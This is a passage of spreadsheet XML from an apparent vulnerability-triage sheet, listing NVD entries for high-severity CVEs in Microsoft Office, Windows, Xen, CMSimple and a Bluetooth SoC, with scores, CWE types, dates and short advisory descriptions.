          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G239" s="5" t="inlineStr"/>
      <c r="H239" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="I239" s="5" t="inlineStr"/>
      <c r="J239" s="5" t="inlineStr"/>
      <c r="K239" s="5" t="inlineStr">
        <is>
          <t>microsoft:365_apps, microsoft:microsoft_365, microsoft:office_2016, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024</t>
        </is>
      </c>
      <c r="L239" s="5" t="inlineStr"/>
      <c r="M239" s="5" t="inlineStr"/>
      <c r="N239" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O239" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P239" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q239" s="5" t="inlineStr"/>
      <c r="R239" s="5" t="inlineStr">
        <is>
          <t>CWE-787</t>
        </is>
      </c>
      <c r="S239" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds write in Microsoft Office allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="T239" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-78524</t>
        </is>
      </c>
    </row>
    <row r="240">
      <c r="A240" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B240" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C240" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-78525</t>
        </is>
      </c>
      <c r="D240" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E240" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F240" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G240" s="5" t="inlineStr"/>
      <c r="H240" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="I240" s="5" t="inlineStr"/>
      <c r="J240" s="5" t="inlineStr"/>
      <c r="K240" s="5" t="inlineStr">
        <is>
          <t>microsoft:365_apps, microsoft:microsoft_365, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024, microsoft:word</t>
        </is>
      </c>
      <c r="L240" s="5" t="inlineStr"/>
      <c r="M240" s="5" t="inlineStr"/>
      <c r="N240" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O240" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P240" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q240" s="5" t="inlineStr"/>
      <c r="R240" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="S240" s="5" t="inlineStr">
        <is>
          <t>Use after free in Microsoft Office Outlook allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="T240" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-78525</t>
        </is>
      </c>
    </row>
    <row r="241">
      <c r="A241" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B241" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C241" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-78526</t>
        </is>
      </c>
      <c r="D241" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E241" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F241" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G241" s="5" t="inlineStr"/>
      <c r="H241" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="I241" s="5" t="inlineStr"/>
      <c r="J241" s="5" t="inlineStr"/>
      <c r="K241" s="5" t="inlineStr">
        <is>
          <t>microsoft:365_apps, microsoft:microsoft_365, microsoft:office_2016, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024</t>
        </is>
      </c>
      <c r="L241" s="5" t="inlineStr"/>
      <c r="M241" s="5" t="inlineStr"/>
      <c r="N241" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O241" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P241" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q241" s="5" t="inlineStr"/>
      <c r="R241" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="S241" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Microsoft Office Word allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="T241" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-78526</t>
        </is>
      </c>
    </row>
    <row r="242">
      <c r="A242" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B242" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C242" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-78834</t>
        </is>
      </c>
      <c r="D242" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E242" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F242" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G242" s="5" t="inlineStr"/>
      <c r="H242" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="I242" s="5" t="inlineStr"/>
      <c r="J242" s="5" t="inlineStr"/>
      <c r="K242" s="5" t="inlineStr"/>
      <c r="L242" s="5" t="inlineStr"/>
      <c r="M242" s="5" t="inlineStr"/>
      <c r="N242" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O242" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P242" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q242" s="5" t="inlineStr"/>
      <c r="R242" s="5" t="inlineStr">
        <is>
          <t>CWE-94</t>
        </is>
      </c>
      <c r="S242" s="5" t="inlineStr">
        <is>
          <t>A code execution vulnerability exists in CMSimple 5.22 in the CoAuthors plugin. An authenticated low-privileged user who can modify page content and provide controlled imported content can trigger server-side execution by referencing crafted external or uploaded text content through the affected content import feature.</t>
        </is>
      </c>
      <c r="T242" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-78834</t>
        </is>
      </c>
    </row>
    <row r="243">
      <c r="A243" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B243" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C243" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-79376</t>
        </is>
      </c>
      <c r="D243" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E243" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F243" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G243" s="5" t="inlineStr"/>
      <c r="H243" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I243" s="5" t="inlineStr"/>
      <c r="J243" s="5" t="inlineStr"/>
      <c r="K243" s="5" t="inlineStr"/>
      <c r="L243" s="5" t="inlineStr"/>
      <c r="M243" s="5" t="inlineStr"/>
      <c r="N243" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O243" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P243" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q243" s="5" t="inlineStr"/>
      <c r="R243" s="5" t="inlineStr">
        <is>
          <t>CWE-1284, CWE-20</t>
        </is>
      </c>
      <c r="S243" s="5" t="inlineStr">
        <is>
          <t>An issue in the l2cap_handle_data() function of Bestechnic Co., Ltd BES2300 Bluetooth Audio SoC firmware v3.x and earlier allows attackers to cause a Denial of Service (DoS) via sending a crafted L2CAP packet.</t>
        </is>
      </c>
      <c r="T243" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-79376</t>
        </is>
      </c>
    </row>
    <row r="244">
      <c r="A244" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B244" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C244" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-79602</t>
        </is>
      </c>
      <c r="D244" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E244" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F244" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G244" s="5" t="inlineStr"/>
      <c r="H244" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I244" s="5" t="inlineStr"/>
      <c r="J244" s="5" t="inlineStr"/>
      <c r="K244" s="5" t="inlineStr"/>
      <c r="L244" s="5" t="inlineStr"/>
      <c r="M244" s="5" t="inlineStr"/>
      <c r="N244" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O244" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P244" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="Q244" s="5" t="inlineStr"/>
      <c r="R244" s="5" t="inlineStr">
        <is>
          <t>CWE-119</t>
        </is>
      </c>
      <c r="S244" s="5" t="inlineStr">
        <is>
          <t>A guest with a PCI device assigned that has at least a BAR on the IO port
space can trigger a BUG() in Xen.</t>
        </is>
      </c>
      <c r="T244" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-79602</t>
        </is>
      </c>
    </row>
    <row r="245">
      <c r="A245" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B245" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C245" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-80074</t>
        </is>
      </c>
      <c r="D245" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E245" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F245" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G245" s="5" t="inlineStr"/>
      <c r="H245" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="I245" s="5" t="inlineStr"/>
      <c r="J245" s="5" t="inlineStr"/>
      <c r="K245" s="5" t="inlineStr"/>
      <c r="L245" s="5" t="inlineStr"/>
      <c r="M245" s="5" t="inlineStr"/>
      <c r="N245" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O245" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P245" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q245" s="5" t="inlineStr"/>
      <c r="R245" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="S245" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Remote Desktop Client allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="T245" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-80074</t>
        </is>
      </c>
    </row>
    <row r="246">
      <c r="A246" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B246" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C246" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-80077</t>
        </is>
      </c>
      <c r="D246" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E246" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F246" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G246" s="5" t="inlineStr"/>
      <c r="H246" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="I246" s="5" t="inlineStr"/>
      <c r="J246" s="5" t="inlineStr"/>
      <c r="K246" s="5" t="inlineStr"/>
      <c r="L246" s="5" t="inlineStr"/>
      <c r="M246" s="5" t="inlineStr"/>
      <c r="N246" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O246" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P246" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q246" s="5" t="inlineStr"/>
      <c r="R246" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="S246" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Remote Desktop Client allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="T246" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-80077</t>
        </is>
      </c>
    </row>
    <row r="247">
      <c r="A247" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B247" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C247" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-80080</t>
        </is>
      </c>
      <c r="D247" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E247" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F247" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G247" s="5" t="inlineStr"/>
      <c r="H247" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="I247" s="5" t="inlineStr"/>
      <c r="J247" s="5" t="inlineStr"/>
      <c r="K247" s="5" t="inlineStr">
        <is>
          <t>microsoft:365_apps, microsoft:microsoft_365, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024, microsoft:word</t>
        </is>
      </c>
      <c r="L247" s="5" t="inlineStr"/>
      <c r="M247" s="5" t="inlineStr"/>
      <c r="N247" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O247" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P247" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q247" s="5" t="inlineStr"/>
      <c r="R247" s="5" t="inlineStr">
        <is>
          <t>CWE-415</t>
        </is>
      </c>
      <c r="S247" s="5" t="inlineStr">
        <is>
          <t>Double free in Microsoft Office Word allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="T247" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-80080</t>
        </is>
      </c>
    </row>
    <row r="248">
      <c r="A248" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B248" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C248" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-80081</t>
        </is>
      </c>
      <c r="D248" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E248" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F248" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G248" s="5" t="inlineStr"/>
      <c r="H248" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="I248" s="5" t="inlineStr"/>
      <c r="J248" s="5" t="inlineStr"/>
      <c r="K248" s="5" t="inlineStr">
        <is>
          <t>microsoft:365_apps</t>
        </is>
      </c>
      <c r="L248" s="5" t="inlineStr"/>
      <c r="M248" s="5" t="inlineStr"/>
      <c r="N248" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O248" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P248" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q248" s="5" t="inlineStr"/>
      <c r="R248" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="S248" s="5" t="inlineStr">
        <is>
          <t>Use after free in Microsoft Office PowerPoint allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="T248" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-80081</t>
        </is>
      </c>
    </row>
    <row r="249">
      <c r="A249" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B249" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C249" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-80083</t>
        </is>
      </c>
      <c r="D249" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E249" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F249" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G249" s="5" t="inlineStr"/>
      <c r="H249" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I249" s="5" t="inlineStr"/>
      <c r="J249" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K249" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_11_23h2, microsoft:windows_11_24h2, microsoft:windows_11_25h2, microsoft:windows_11_26h1, microsoft:windows_server_2022, microsoft:windows_server_2025</t>
        </is>
      </c>
      <c r="L249" s="5" t="inlineStr"/>
      <c r="M249" s="5" t="inlineStr"/>
      <c r="N249" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O249" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P249" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="Q249" s="5" t="inlineStr"/>
      <c r="R249" s="5" t="inlineStr">
        <is>
          <t>CWE-822</t>
        </is>
      </c>
      <c r="S249" s="5" t="inlineStr">
        <is>
          <t>Untrusted pointer dereference in Windows Hyper-V allows an authorized attacker to execute code locally.</t>
        </is>
      </c>
      <c r="T249" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-80083</t>
        </is>
      </c>
    </row>
    <row r="250">
      <c r="A250" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B250" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C250" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-80085</t>
        </is>
      </c>
      <c r="D250" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E250" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F250" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G250" s="5" t="inlineStr"/>
      <c r="H250" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="I250" s="5" t="inlineStr"/>
      <c r="J250" s="5" t="inlineStr"/>
      <c r="K250" s="5" t="inlineStr">
        <is>
          <t>microsoft:365_apps, microsoft:microsoft_365, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024, microsoft:word</t>
        </is>
      </c>
      <c r="L250" s="5" t="inlineStr"/>
      <c r="M250" s="5" t="inlineStr"/>
      <c r="N250" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O250" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P250" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q250" s="5" t="inlineStr"/>
      <c r="R250" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="S250" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Microsoft Office Word allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="T250" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-80085</t>
        </is>
      </c>
    </row>
    <row r="251">
      <c r="A251" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B251" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C251" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-80096</t>
        </is>
      </c>
      <c r="D251" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E251" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F251" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G251" s="5" t="inlineStr"/>
      <c r="H251" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="I251" s="5" t="inlineStr"/>
      <c r="J251" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K2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51" s="5" t="inlineStr"/>
      <c r="M251" s="5" t="inlineStr"/>
      <c r="N251" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O251" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P251" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="Q251" s="5" t="inlineStr"/>
      <c r="R251" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="S251" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds read in Windows Remote Desktop Services allows an authorized attacker to elevate privileges over a network.</t>
        </is>
      </c>
      <c r="T251" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-80096</t>
        </is>
      </c>
    </row>
    <row r="252">
      <c r="A252" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B252" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C252" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81352</t>
        </is>
      </c>
      <c r="D252" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E252" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F252" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G252" s="5" t="inlineStr"/>
      <c r="H252" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="I252" s="5" t="inlineStr"/>
      <c r="J252" s="5" t="inlineStr"/>
      <c r="K252" s="5" t="inlineStr"/>
      <c r="L252" s="5" t="inlineStr"/>
      <c r="M252" s="5" t="inlineStr"/>
      <c r="N252" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O252" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P252" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q252" s="5" t="inlineStr"/>
      <c r="R252" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="S252" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Microsoft Windows Codecs Library allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="T252" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81352</t>
        </is>
      </c>
    </row>
    <row r="253">
      <c r="A253" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B253" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C253" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81385</t>
        </is>
      </c>
      <c r="D253" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E253" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F253" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G253" s="5" t="inlineStr"/>
      <c r="H253" s="5" t="n">
        <v>0.01</v>
      </c>
      <c r="I253" s="5" t="inlineStr"/>
      <c r="J253" s="5" t="inlineStr"/>
      <c r="K253" s="5" t="inlineStr">
        <is>
          <t>microsoft:365_apps, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024, microsoft:publisher</t>
        </is>
      </c>
      <c r="L253" s="5" t="inlineStr"/>
      <c r="M253" s="5" t="inlineStr"/>
      <c r="N253" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O253" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P253" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q253" s="5" t="inlineStr"/>
      <c r="R253" s="5" t="inlineStr">
        <is>
          <t>CWE-502</t>
        </is>
      </c>
      <c r="S253" s="5" t="inlineStr">
        <is>
          <t>Deserialization of untrusted data in Microsoft Office Publisher allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="T253" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81385</t>
        </is>
      </c>
    </row>
    <row r="254">
      <c r="A254" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B254" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C254" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81952</t>
        </is>
      </c>
      <c r="D254" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E254" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F254" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G254" s="5" t="inlineStr"/>
      <c r="H254" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="I254" s="5" t="inlineStr"/>
      <c r="J254" s="5" t="inlineStr"/>
      <c r="K254" s="5" t="inlineStr">
        <is>
          <t>microsoft:365_apps, microsoft:microsoft_365, microsoft:office_2016, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024</t>
        </is>
      </c>
      <c r="L254" s="5" t="inlineStr"/>
      <c r="M254" s="5" t="inlineStr"/>
      <c r="N254" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O254" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P254" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q254" s="5" t="inlineStr"/>
      <c r="R254" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="S254" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Microsoft Office Word allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="T254" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81952</t>
        </is>
      </c>
    </row>
    <row r="255">
      <c r="A255" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B255" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C255" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81955</t>
        </is>
      </c>
      <c r="D255" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E255" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F255" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G255" s="5" t="inlineStr"/>
      <c r="H255" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="I255" s="5" t="inlineStr"/>
      <c r="J255" s="5" t="inlineStr"/>
      <c r="K255" s="5" t="inlineStr"/>
      <c r="L255" s="5" t="inlineStr"/>
      <c r="M255" s="5" t="inlineStr"/>
      <c r="N255" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O255" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P255" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q255" s="5" t="inlineStr"/>
      <c r="R255" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="S255" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Microsoft Graphics Component allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="T255" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81955</t>
        </is>
